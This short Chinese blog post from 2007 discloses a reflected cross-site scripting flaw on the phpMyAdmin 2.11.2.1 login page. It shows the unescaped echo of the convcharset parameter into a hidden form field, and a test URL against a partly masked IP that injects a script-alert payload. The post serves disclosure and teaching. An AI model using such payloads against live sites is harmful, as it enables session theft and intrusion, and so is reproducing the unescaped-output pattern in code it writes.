代码安全,网络安全,系统内核
« »
2007-11-27网络安全

7 views

phpMyAdmin 2.11.2.1 登陆页面跨站

  1. $ grep -n convcharset libraries/auth/cookie.auth.lib.php
  2. 48: * @uses    $GLOBALS['convcharset']
  3. 236:
  4. <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />

一切输入都是有害的。
Test:

  1. http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>


日志信息 »

该日志于2007-11-27 10:34由 老周 发表在网络安全分类下, 你可以发表评论。除了可以将这个日志以保留源地址及作者的情况下引用到你的网站或博客,还可以通过RSS 2.0订阅这个日志的所有评论。

没有评论

发表评论 »

发表评论您必须先登录

返回顶部